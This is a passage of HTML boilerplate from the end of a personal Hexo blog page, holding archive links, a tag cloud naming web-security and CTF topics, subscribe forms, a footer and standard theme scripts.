href="/archives/2021/05/"><span class="level-start"><span class="level-item">May 2021</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/04/"><span class="level-start"><span class="level-item">April 2021</span></span><span class="level-end"><span class="level-item tag">16</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/03/"><span class="level-start"><span class="level-item">March 2021</span></span><span class="level-end"><span class="level-item tag">16</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/02/"><span class="level-start"><span class="level-item">February 2021</span></span><span class="level-end"><span class="level-item tag">22</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/01/"><span class="level-start"><span class="level-item">January 2021</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/12/"><span class="level-start"><span class="level-item">December 2020</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/11/"><span class="level-start"><span class="level-item">November 2020</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/10/"><span class="level-start"><span class="level-item">October 2020</span></span><span class="level-end"><span class="level-item tag">10</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/CSRF/"><span class="tag">CSRF</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/MYSQL/"><span class="tag">MYSQL</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/PHP/"><span class="tag">PHP</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/XSS/"><span class="tag">XSS</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/bugku/"><span class="tag">bugku</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/bugku2/"><span class="tag">bugku2</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/hexo/"><span class="tag">hexo</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/html/"><span class="tag">html</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/html%E5%8E%9F%E7%90%86/"><span class="tag">html原理</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/php/"><span class="tag">php</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sqlmap/"><span class="tag">sqlmap</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/sql%E6%B3%A8%E5%85%A5/"><span class="tag">sql注入</span><span class="tag">9</span></a></div><div class="control"><a class="tags has-addons" href="/tags/typro/"><span class="tag">typro</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/xss/"><span class="tag">xss</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%BC%B9shell/"><span class="tag">反弹shell</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"><span class="tag">文件上传</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"><span class="tag">文件包含</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="tag">渗透测试</span><span class="tag">1</span></a></div></div></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe for updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="card widget"><div class="card-content"><div class="notification is-danger">You need to set <code>client_id</code> and <code>slot_id</code> to show this AD unit. Please set it in <code>_config.yml</code>.</div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="Tlife" height="28"></a><p class="is-size-7"><span>&copy; 2023 vague huang</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2019</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body></html>